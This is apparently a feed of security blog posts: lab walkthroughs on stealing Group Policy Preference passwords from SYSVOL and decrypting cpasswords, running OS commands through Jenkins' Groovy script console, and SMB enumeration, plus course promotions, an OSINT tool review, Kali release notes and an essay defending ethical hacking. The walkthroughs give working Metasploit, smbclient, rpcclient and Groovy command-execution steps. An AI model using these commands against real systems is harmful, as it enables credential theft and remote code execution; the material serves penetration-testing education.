All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\

When a new GPP is created for the user or group account, it’ll interrelated with a Group.XML file created in SYSVOL with the relevant configuration information and the password is AES-256 bit encrypted. Therefore the password is not secure as all authenticated users have access to SYSVOL.

“In this article, we will be doing active directory penetration testing through Group Policy Preferences and try to steal store password from inside SYSVOL in multiple ways”.

Let’s Start!!

Lab Set-Up Requirement

  • Microsoft Windows Sever 2008 r2
  • Microsoft Windows 7/10
  • Kali Linux

Create an Account in Domain Controller with GPP

On your Windows Server 2008, you need to create a new group policy object (GPO) under “Domain Controller” using Group Policy Management.

Now create a new user account by navigating to: Computer Configuration > Control Panel Settings > Local Users and Groups.

Then Right click in the “Local Users and Groups” option and select New > Local User.

Then you get an interface for new local user property where you can create a new user account.

As you can observe from the given below image, we had created an account for user “raaz”.

Don’t forget to update group policy configuration.

So as I had already discussed above, that, whenever a new gpp is created for the user or group account, it will associated with a Group.XML which is stored inside /SYSVOl.

From the image below, you can see the entire path that leads to the file Group.xml. As you can see, this xml file holds cpassword for user raaz within the property tags in plain text.

Exploiting Group Policy Preferences via Metasploit -I

As we know an authorized user can access SYSVOL and suppose I know the client machine credential, let say raj:Ignite@123 then with help of this I can exploit Group Policy Preference to get XML file. Metasploit auxiliary module lets you enumerates files from target domain controllers by connecting to SMB as rouge user.

This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsofts public AES key. This module has been tested successfully on a Win2k8 R2 Domain Controller.

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit

Hence you can observe, that it has dump the password:abcd@123 from inside Group.xml file for user raaz.

Exploiting Group Policy Preferences via Metasploit -II

Metasploit also provide a post exploit for enumerating cpassword, but for this you need to compromised target’s machine at least once and then you will be able to run below post exploit.

This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsofts public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked.

use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit

From the given below image you can observe, it has been found cpassword twice from two different locations:

  • C:\ProgramData\Microsoft\Group Policy\History\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml
  • C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

Gpp-Decrypt

Another method is to connect with target’s machine via SMB and try to access /SYSVOL with the help smbclient. Therefore execute its command to access shared directory via authorized account and then move to following path to get Group.xml file: SYSVOL\sysvol\Pentes.Local\Policies\{ EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

smbclient //192.168.1.103/SYSVOL -U raj

As you can observe that, we have successfully transfer Group.xml in our local machine. As this file holds cpassword, so now we need to decrypt it.

For decryption we use ” gpp- decrypt” which is embedded in a simple ruby script in Kali Linux which decrypts a given GPP encrypted string.

Once you got access to Group.xml file, you can decrypt cpassword with the help of following syntax:

gpp-decrypt <encrypted cpassword >
gpp-decrypt qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dump password in plain text as shown below.

GP3finder

This is another script written in python for decrypting cpassword and you can download this tool from here.

Once you got access to Group.xml file, you can decrypt cpassword with the help of following syntax:

gpp-decrypt <encrypted cpassword >
gp3finder.exe -D qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dump password in plain text as shown below.

PowerShell Empire

This another framework just like Metasploit where you need to access low privilege shell. once you exploit target machine then use privesc/gpp module to extract password from inside Group.xml file.

This module Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

agents
usemodule privesc/gpp
execute

As a result, it dump password in plain text as shown below.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Penetration Testing on Group Policy Preferences appeared first on Hacking Articles.

Exploiting Jenkins Groovy Script Console in Multiple Ways

Hello Friends!! There were so many possibilities to exploit Jenikins however we were interested in Script Console because Jenkins has lovely Groovy script console that permits anyone to run arbitrary Groovy scripts inside the Jenkins master runtime.

Table of Content

  • Jenkin’s Groovy Script Console
  • Metasploit
  • groovy
  • Groovy executing shell commands -I
  • Groovy executing shell commands -II

Jenkin’s Groovy Script Console

Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents. It is a web-based Groovy shell into the Jenkins runtime. Groovy is a very powerful language which offers the ability to do practically anything Java can do including:

  • Create sub-processes and execute arbitrary commands on the Jenkins master and agents.
  • It can even read files in which the Jenkins master has access to on the host (like /etc/passwd)
  • Decrypt credentials configured within Jenkins.
  • Granting a normal Jenkins user Script Console Access is essentially the same as giving them Administrator rights within Jenkins.

Source : https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console

Metasploit

This module uses the Jenkins-CI Groovy script console to execute OS commands using Java.

use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set rhost 192.168.1.106
msf exploit(jenkins_script_console) > set rport 8484
msf exploit(jenkins_script_console) > set targeturi /
msf exploit(jenkins_script_console) > set target 0
msf exploit(jenkins_script_console) > exploit

Metasploit uses command stager to exploit against command injection.

Hence, you can observe, that it has given meterpreter session of victim’s machine.

revsh.groovy

Suppose if you found Jenkins without login password or you are a normal user who has permission to access script console then you can exploit this privilege to get reverse shell of the machine. At Jenkins Dashboard go to Manage Jenkins and then select Script Console.

At script console, you have full privilege to run any program code, therefore I try to execute following piece of code which I had taken from Github to get reverse connection on my local machine via netcat listener.

nc -lvp 1234

Once the above script will be executed, it will give netcat session of victim’s machine.

Groovy executing shell commands -I

Similarly with the help of following piece of code which I found from this here, I try to create RCE for executing OS command through groovy script console. 

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

 

Groovy executing shell commands -II

Similarly, I found another very small piece of code to exploit Groovy Console from here, which will generate RCE and execute shell command.

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Exploiting Jenkins Groovy Script Console in Multiple Ways appeared first on Hacking Articles.

Our Amazing 2018, Thanks To You

Before 2018 has officially come and gone, let’s take a quick trip down memory lane and see the events that made up this amazing year.

Reading from a mobile device? Click on the infographic to make it bigger.

That’s a wrap! The team would like to thank each and every one of you for trusting eLearnSecurity to advance your careers, always being an active part of our community, and for helping us reach new heights every year.

Happy New Year, everybody!

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

A Little Guide to SMB Enumeration

Enumeration is very essential phase of Penetration testing, because when a pentester established active connection with victim, then he try to retrieve as much as possible information of victim’s machine, which could be useful to exploit further.

In this article, we had explore SMB enumeration using Kali Linux inbuilt command-line tools only.

Table of Content

  • Nmblookup
  • nbtscan
  • SMBMap
  • Smbclient
  • Rpcclient
  • Nmap
  • Enum4linux

nmblookup

nmblookup is used to query NetBIOS names and map them to IP addresses in a network using NetBIOS over TCP/IP queries. The options allow the name queries to be directed at a particular IP broadcast area or to a particular machine. All queries are done over UDP.

nmblookup -A 192.168.1.103

nmblookup is helpful command for enumerating domain/workstation and MAC address. NetBIOS work with the help of NetBIOS suffixes as state following information:

For unique names:

    00: Workstation Service (workstation name)

    03: Windows Messenger service

    06: Remote Access Service

    20: File Service (also called Host Record)

    21: Remote Access Service client

    1B: Domain Master Browser – Primary Domain Controller for a domain

    1D: Master Browser

For group names:

    00: Workstation Service (workgroup/domain name)

    1C: Domain Controllers for a domain

    1E: Browser Service Elections

nbtscan

This is a command utility that try to scan NETBIOS name servers open on a local or remote TCP / IP network and because it is a first step in finding open shares. It is created on the functionality of the Windows standard tool “nbtstat”, and it works on a whole subnet instead of individual IP.

nbtscan 192.168.1.1/24

 As you can observe it has dump almost same result as above, but the most important fact is that it enumerate whole subnet.

SMBMap

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

smbmap -H 192.168.1.102
smbmap -H 192.168.1.102 -d metasploitable -u msfadmin -p msfadmin

As you can observe, this tool not only shows share files even show their permission. If you will notice second command then you will perceive that it has shown permission for user “msfadmin”.

Smbclient

smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the ftp program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on

smbclient -L 192.168.1.102
smbclient //192.168.1.102/tmp

As you can observe with the help of smbclient we are able to view share folder of victim’s machine. Moreover we can use smbclient for sharing file in the network. Here you can observe we had login successfully using anonymous login and transfer the user.txt file.

Rpcclient

rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself. It has undergone several stages of development and stability. Many system administrators have now written scripts around it to manage Windows NT clients from their UNIX workstation.

We can use rpcclient to open an authenticated SMB session to a target machine by running the below command on our system where we have used a NULL Session, as we have entered a username of “”.

rpcclient -U "" -N 192.168.1.102
enumdomusers

Further we had use enumerate user command, and you can see the user names as well as their RID (the suffix of their SID) in hexadecimal form.

We have use the queryuser command to catch all kinds of information related to an individual user based uniquely on the users RID in hexa form, here RID: 0x3e8 denotes root user account.

queryuse 0x3e8

Here note that the output result shows the last logon time for the user root, as well as the Password last set Time. Such kind of things is very valuable for penetration testers. And, this all can be achieve without an admin user name and password.

Nmap

Following Script attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

nmap --script smb-vuln* -p 139,445 192.168.1.103

The script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error “STATUS_INSUFF_SERVER_RESOURCES” is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems.

From the given below image you can observe, it found target machine is vulnerable to ms17-010 due to SMBv1.

Enum4linux

Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com.

It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup.

The tool usage can be found below followed by examples, previous versions of the tool can be found at the bottom of the page.

Key features:

  • RID cycling (When RestrictAnonymous is set to 1 on Windows 2000)
  • User listing (When RestrictAnonymous is set to 0 on Windows 2000)
  • Listing of group membership information
  • Share enumeration
  • Detecting if host is in a workgroup or a domain
  • Identifying the remote operating system
  • Password policy retrieval (using polenum)

enumlinux -a 192.168.1.102

As you can observe, it has shown target belongs to Workgroup and dump NetBIOS name along with their suffix and many more information.

Also perform enumerate user along with their RID in hexadecimal form with the help of rpcclient. Hence enum4linux is Swiss-knife when we perform enumeration. But it cannot identify SMB vulnerability like Nmap.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post A Little Guide to SMB Enumeration appeared first on Hacking Articles.

Top 10 Skills Every Purple Teamer Must Have

Today, cyber threats are created faster and are in a more sophisticated manner than ever before. Bad actors are ready to go the extra mile to get their hands on all types of organizations, industries, and information. So, in a hyper-connected world where everyone is a target, what are the top skills purple teamers need to have? Find out.
Top 10 Skills Every Purple Teamer Must Have
  1. Web Application Penetration Testing — It is the process of using penetration testing techniques on a web application to detect its vulnerabilities before cybercriminals do.
  2. Mobile Penetration Testing — Mobile apps are becoming an increasing asset for businesses, but a threat at the same time. To make sure customers’ data is secure, mobile apps need to be tested for vulnerabilities as well.
  3. WiFi Penetration Testing —  A compromised wifi puts an entire’s organization network at risk. WiFi penetration testing is a crucial skill for IT Security professionals in 2018, and hiring managers know it.
  4. Advanced Social Engineering — Knowing the various means by which attackers can use social engineering techniques to gain access to an organization’s data is a great skill for all security professionals. You’ll need to be aware of the psychology and technical elements involved in phishing, vishing, baiting, etc.
  5. Advanced Adversary Simulation — By performing security assessments that simulate adversary attacks, an organization’s security is put to the test — from inside out, and focused on what attackers can get access to when successfully penetrating an organization’s environment.
  6. Defense Evasion — Defense Evasion is a tactic an adversary may use to bypass an information security device in order to ‘evade’ detection, or other defenses. Needless to say, it’s a red-teamer’s essential skill too.
  7. Threat Hunting — Threat Hunting skills come with knowing how to proactively search through networks to detect and isolate advanced threats that may have evaded existing security solutions.
  8. Threat Intelligence — By knowing how to analyze internal and external threats an organization may face, you are gathering threat intelligence. This knowledge will then help you make more informed decisions on potential remediation solutions, plans, etc.
  9. Incident Response — Incident response skills come with being able to address and manage the aftermath of a security breach or cyber attack. This comes in handy in a world where an attack happens every 39 seconds on average.
  10. Endpoint Monitoring — Endpoints are typically the initial target because they provide an entry point to the network, and therefore, access to the data attackers want. Knowing how to thoroughly monitor those endpoints and detect unknown threats is a valuable skill for any IT security professional to have.
How Can You Get There?

The purple teamer training path was designed as a guide for you to become equally skilled in both advanced offensive and defensive security techniques. This training path includes the latest versions of our Penetration Testing Professional (PTP), Penetration Testing Extreme (PTX), and Threat Hunting Professional (THP) training courses. Dive into the Purple Teamer path with a free demo of each course and see for yourself!

Click on the icons below to request your free demos:

Special Offer — Until November 30, 2018

If you are just beginning in this field, or if you feel that you need to review the penetration testing basics, we’re offering a free Penetration Testing Student (PTS) training course in Elite Edition with every enrollment in the PTP training course in Elite Edition until November 30, 2018.

Learn more about this offer, or click below to get started NOW.
> GET MY FREE PTS ELITE

Connect with us on Social Media

Twitter Facebook LinkedIn Instagram

Toolsmith #127: OSINT with Datasploit

I was reading an interesting Motherboard article, Legal Hacking Tools Can Be Useful for Journalists, Too, that includes reference to one of my all time OSINT favorites, Maltego. Joseph Cox's article also mentions Datasploit, a 2016 favorite for fellow tools aficionado, Toolswatch.org, see 2016 Top Security Tools as Voted by ToolsWatch.org Readers. Having not yet explored Datasploit myself, this proved to be a grand case of "no time like the present."
Datasploit is "an #OSINT Framework to perform various recon techniques, aggregate all the raw data, and give data in multiple formats." More specifically, as stated on Datasploit documentation page under Why Datasploit, it utilizes various Open Source Intelligence (OSINT) tools and techniques found to be effective, and brings them together to correlate the raw data captured, providing the user relevant information about domains, email address, phone numbers, person data, etc. Datasploit is useful to collect relevant information about target in order to expand your attack and defense surface very quickly.
The feature list includes:
  • Automated OSINT on domain / email / username / phone for relevant information from different sources
  • Useful for penetration testers, cyber investigators, defensive security professionals, etc.
  • Correlates and collaborate results, shows them in a consolidated manner
  • Tries to find out credentials,  API keys, tokens, sub-domains, domain history, legacy portals, and more as related to the target
  • Available as single consolidating tool as well as standalone scripts
  • Performs Active Scans on collected data
  • Generates HTML, JSON reports along with text files
Resources
Github: https://github.com/datasploit/datasploit
Documentation: http://datasploit.readthedocs.io/en/latest/
YouTube: Quick guide to installation and use

Pointers
Second, a few pointers to keep you from losing your mind. This project is very much work in progress, lots of very frustrated users filing bugs and wondering where the support is. The team is doing their best, be patient with them, but read through the Github issues to be sure any bugs you run into haven't already been addressed.
1) Datasploit does not error gracefully, it just crashes. This can be the result of unmet dependencies or even a missing API key. Do not despair, take note, I'll talk you through it.
2) I suggest, for ease, and best match to documentation, run Datasploit from an Ubuntu variant. Your best bet is to grab Kali, VM or dedicated and load it up there, as I did.
3) My installation guidance and recommendations should hopefully get you running trouble free, follow it explicitly.
4) Acquire as many API keys as possible, see further detail below.

Installation and preparation
From Kali bash prompt, in this order:

  1. git clone https://github.com/datasploit/datasploit /etc/datasploit
  2. apt-get install libxml2-dev libxslt-dev python-dev lib32z1-dev zlib1g-dev
  3. cd /etc/datasploit
  4. pip install -r requirements.txt
  5. mv config_sample.py config.py
  6. With your preferred editor, open config.py and add API keys for the following at a minimum, they are, for all intents and purposes required, detailed instructions to acquire each are here:
    1. Shodan API
    2. Censysio ID and Secret
    3. Clearbit API
    4. Emailhunter API
    5. Fullcontact API
    6. Google Custom Search Engine API key and CX ID
    7. Zoomeye Username and Password
If, and only if, you've done all of this correctly, you might end up with a running instance of Datasploit. :-) Seriously, this is some of the glitchiest software I've tussled with in quite a while, but the results paid handsomely. Run python datasploit.py domain.com, where domain.com is your target. Obviously, I ran python datasploit.py holisticinfosec.org to acquire results pertinent to your author. 
Datasploit rapidly pulled results as follows:
211 domain references from Github:
Github results
Luckily, no results from Shodan. :-)
Four results from Paste(s): 
Pastebin and Pastie results
Datasploit pulled russ at holisticinfosec dot org as expected, per email harvesting.
Accurate HolisticInfoSec host location data from Zoomeye:

Details regarding HolisticInfoSec sub-domains and page links:
Sub-domains and page links
Finally, a good return on DNS records for holisticinfosec.org and, thankfully, no vulns found via PunkSpider

DataSploit can also be integrated into other code and called as individual scripts for unique functions. I did a quick run with python emailOsint.py russ@holisticinfosec.org and the results were impressive:
Email OSINT
I love that the first query is of Troy Hunt's Have I Been Pwned. Not sure if you have been? Better check it out. Reminder here, you'll really want to be sure to have as many API keys as possible or you may find these buggy scripts crashing. You'll definitely find yourself compromising between frustration and the rapid, detailed results. I put this offering squarely in the "shows much promise category" if the devs keep focus on it, assess for quality, and handle errors better.
Give Datasploit a try for sure.
Cheers, until next time...

Hacking WPA Enterprise with Kali Linux

Admittedly, somewhat of a click-bait blog post title - but bear with us, it's for a good reason. Lots of work goes on behind the scenes of Kali Linux, tools get updated every day and interesting new features are added constantly. Most of these tool updates and feature additions go unannounced, and are then discovered by inquisitive users - however this time, we had to make an exception.

Toolsmith Release Advisory: Kali Linux 2016.2 Release

On the heels of Black Hat and DEF CON, 31 AUG 2016 brought us the second Kali Rolling ISO release aka Kali 2016.2. This release provides a number of updates for Kali, including:
  • New KDE, MATE, LXDE, e17, and Xfce builds for folks who want a desktop environment other than Gnome.
  • Kali Linux Weekly ISOs, updated weekly builds of Kali that will be available to download via their mirrors.
  • Bug Fixes and OS Improvements such as HTTPS support in busybox now allowing the preseed of Kali installations securely over SSL. 
All details available here: https://www.kali.org/news/kali-linux-20162-release/
Thanks to Rob Vandenbrink for calling out this release. 

Kali Rolling ISO of DOOM, Too.

A while back we introduced the idea of Kali Linux Customization by demonstrating the Kali Linux ISO of Doom. Our scenario covered the installation of a custom Kali configuration which contained select tools required for a remote vulnerability assessment. The customised Kali ISO would undergo an unattended autoinstall in a remote client site, and automatically connect back to our OpenVPN server over TCP port 443. The OpenVPN connection would then bridge the remote and local networks, allowing us full "layer 3" access to the internal network from our remote location. The resulting custom ISO could then be sent to the client who would just pop it into a virtual machine template, and the whole setup would happen automagically with no intervention - as depicted in the image below.

In Defense of Ethical Hacking

Pete Herzog, wrote an interesting piece on Dark Matters (Norse’s blog platform) a while back, and I’ve given it a few days to sink in because I didn’t want my response to be emotional. After a few days I’ve re-read the post a few more times and still have no idea where Pete, someone I otherwise is fairly sane and smart (see his bio - http://blog.norsecorp.com/author/pherzog/) , gets this premise he’s writing about. In fact, it annoyed me enough that I wrote up a response to his post… and Pete, I’m confused where this point of view comes from! I’d genuinely like to know… I’ll reach out and see if we can figure it out.

— For the sake of this blog post, I consider ethical hacking and penetration testing to effectively be the same thing. I know not everyone agrees, and that’s unfortunate, but I guess you can’t please everyone.

So here on my comments on Pete’s blog post titled “The Myth of Ethical Hacking (http://blog.norsecorp.com/2015/01/27/the-myth-of-ethical-hacking/)”



I thought reacting is what you did when you weren’t secure. And I thought ethical hacking was proactive, showing you could take advantage of opportunities left by the stupid people who did the security.
— Boy am I glad he doesn’t think this way anymore. Reacting is part of life, but it’s not done because you’re insecure, it’s done because business and technology along with your adversaries is dynamic. It’s like standing outside without an umbrella. It’s not raining… but if you stand there long enough you’ll need an umbrella. It’s not that you are stupid, it’s that weather changes. If you’re in Chicago, like I am, this happens about every 2.7 seconds.
I also thought ethical hacking and security testing were the same thing, because while security testing focused on making sure all security controls were there and working right and ethical hacking focused on showing a criminal could penetrate existing security controls, both were about proactively learning what needed to be better secured.
— That’s an interesting distinction. I can’t say I believe this is any more than a simple different in word choice. Isn’t this all about validation of the security an organization thinks they have, versus the reality of how attackers act and what they will target? I guess I could be wrong, but these terms: vulnerability testing, penetration testing, ethical hacking, security testing — they create confusion in the people trying to consume these services, understand security, and hire. Do they have any real value? I this this is one reason standards efforts by people in the security testing space were started, to demystify, de-obfuscate, and lessen confusion. Clearly it’s not working as intended?
Ethical hacking, penetration testing, and red-teaming are still considered valid ways to improve security posture despite that they test the tester as much, if not more, than the infrastructure.
— Now, here’s a statement that I largely agree with. It’s not controversial anymore to say this. This is why things like the PTES (Penetration Testing Execution Standard) were born. Taking a look at the people who are behind this, standard you can easily see that it’s not just another shot in the dark or empty effort - http://www.pentest-standard.org/index.php/FAQ. Standardizing how a penetration test (or ethical hack, these should be the same thing in my mind). Let me address red teaming for a minute too. Red Team exercises are not the same thing as penetration testing and ethical hacking — not really — it’s like the difference between asking someone if they can pick the lock on the front door, versus daring someone to break into your house and steal your passport without reservation. Red Teaming is a more aggressive approach. I’ve heard some call Red Team exercises “closer to what an actual attacker would behave like”, your mileage may vary on that one. Bottom line, though, you always get the quality you ask for (pay for). If you are willing to pay for high-grade talent, generally speaking you’ll get high grade talent. If you’re looking for a cheap penetration test your results will likely be vastly different because the resources on the job may not be as senior or knowledgeable. The other thing here is this — not all penetration testers are experts in all technologies at your shop. Keep this in mind. Some folks are magicians with a Linux/Unix system, while others have grown their expertise in the Windows world. Some are web application experts, some are infrastructure experts, and some are generalists. The bottom line is that this is both true, something that should be accounted for, and largely not the fault of the tester.
Then again nearly everything has a positive side we can see if we squint. And as a practical, shake-the-CEO-into-awareness technique, criminal hacking simulations should be good for fostering change in a security posture.
— I read this and wonder to myself… if the CEO hasn’t already been “shaken into awareness” through headlines in the papers and nightly news, then there is something else going on here that a successful ethical hack ransack of the enterprise likely won’t solve.
So somehow, ethical hackers with their penetration testing and red-teaming, despite any flaws, have taken on this status of better security than, say, vulnerability scanning. Because there’s a human behind it? Is it artisan, and thus we pay more?
— Wait, what?! If you see these two as equal, then you’ve either done a horrible job at picking your ethical hacker/penetration testers, or you don’t understand what you’re saying. As someone who spent a few years demonstrating to companies that web application security tools were critical to their success, I’ve never, ever said they can replace a human tester. Ever. To answer the question directly — YES, because there’s a human behind it, this is an entirely different thing. See above about quality of penetration tester, but the point stands.
It also has a fatal flaw: It tests for known vulnerabilities. However, in great marketing moves of the world volume 1, that is exactly how they promote it. That’s why companies buy it. But if an ethical hacker markets that they test only for known vulnerabilities, we say they suck.
— Oh, I think I see what’s going on here. The author is confusing vulnerability assessment with penetration testing, maybe. That’s the only logical explanation I can think of. Penetration testers have a massive advantage over scanning tools because of this wonderful thing called the human intellect. They can see and interpret errors that systems kick back. Because tools look for patterns, and respond accordingly, there are times where a human can see an error message and understand what it’s implying, but the machine has no such ability. In spite of all of technology’s advancements, tools are still using regular expressions and some rudimentary if-then clauses for pattern recognition. Machines, and by that way software, do not think. This gives software a disadvantage over a human 100% of the time.
Now vulnerability scanning is indeed reactive. We wait for known flaws to be known, scan for them, and we then react to that finding by fixing it. Ethical hacking is indeed proactive. But not because it gives the defender omniscient threat awareness, but rather so we can know all the ways where someone can break in. Then we can watch for it or even fix it.
— I’m going to ignore the whole reactive vs proactive debate here. I don’t believe it’s productive to the post here, and I think many people don’t understand what these terms mean in security anyway. First, you’ll never, ever know “all the ways someone can break in”, ever. Never. That’s the beauty of the human mind. Human beings are a creative bunch, and when properly incentivized, we will find a way once we’ve exhausted all the known ways. However, there’s a little caveat here, which is not talked about enough I don’t believe. The reason we won’t ever know all the ways someone can break in, even if we give humans the ability to find all the ways — is this thing called scope, and time. Penetration testers, ethical hackers and whatever you want to call them are time-boxed. Rarely do you get an open-ended contract, or even in the case of an internal resource, the ability to dedicate all the time you have to the task of finding ways to break in. Furthermore, there are many, many, many ways to break in typically. Systems can be mis-configured, un-patched, and left exposed in a million different ways. And even if you did have all the time you needed, these systems are dynamic and are going to change on you at some point, unless you work in one of "those" organizations, and if so then you’ve got bigger problems.
But does it really work that way? Isn’t what passes for ethical hacking too often just running vulnerability scanners to find the low hanging fruit and exploit that to prove a criminal could get in? Isn’t that really just finding known vulnerabilities like a vulnerability scanner does, but with a little verification thrown in?
— And here it is. Let me answer this question from the many, many people I know who do actual ethical hacking/penetration testing: no. Also if you find this to be actually true in your experience, you’re getting the wrong penetration testers. Maybe fire your provider or staff.
There’s this myth that ethical hackers will make better security by breaking through existing security in complicated, sometimes clever ways that point out the glaring flaw(s) of the moment for remediation.
— Talk to someone who does serious penetration testing for a living, or manages one of these teams. Many of them have a store of clever, custom code up their sleeves but rarely have to use it because the systems they test have so much broken on them that dropping custom code isn’t even remotely necessary.
But we know that all too often it’s just vulnerability scanning with scare tactics.
—Again, you’re dealing with some seriously amateur, bad people or providers. Fire them.
And when there’s no way in, they play the social engineering card.
— a) I don’t see the issue with this approach, b) there’s a 99.9% chance there is a way in without “playing the social engineering card”.
One of the selling points of ethical hacking is the skilled use of social engineering. Let me save you some money: It works.
— Yes, 90%+ of the time, even when the social engineer isn’t particularly skilled, it works. Why? Human nature. Also employees that don’t know better. So what if it works though, you still need to leverage that testing to show real-use-cases of how your defenses were easily penetrated for educational purposes. Record it. Highlight those employees who let that guy with the 4 coffee cups in his hands through the turnstile without asking for a badge…but do it constructively so that they and their peers will remember. Testing should drive awareness, and real-life use cases are priceless.
So if ethical hacking as it’s done is a myth…
— Let me stop you right there. It’s not, you’ve just had some terrible experiences I don’t believe are indicative of the wider industry. So since the rest of the article is based on this, I think we’re done here.